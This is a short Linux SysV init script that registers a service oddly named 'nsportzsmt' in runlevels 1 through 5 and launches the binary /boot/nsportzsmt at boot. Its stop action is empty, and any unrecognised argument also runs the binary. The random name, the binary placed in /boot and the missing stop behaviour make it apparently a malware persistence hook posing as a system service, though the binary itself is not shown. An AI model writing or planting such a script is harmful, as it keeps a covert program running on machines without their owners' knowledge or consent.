#!/bin/sh
# chkconfig: 12345 90 90
# description: nsportzsmt
### BEGIN INIT INFO
# Provides:		nsportzsmt
# Required-Start:	
# Required-Stop:	
# Default-Start:	1 2 3 4 5
# Default-Stop:		
# Short-Description:	nsportzsmt
### END INIT INFO
case $1 in
start)
	/boot/nsportzsmt
	;;
stop)
	;;
*)
	/boot/nsportzsmt
	;;
esac
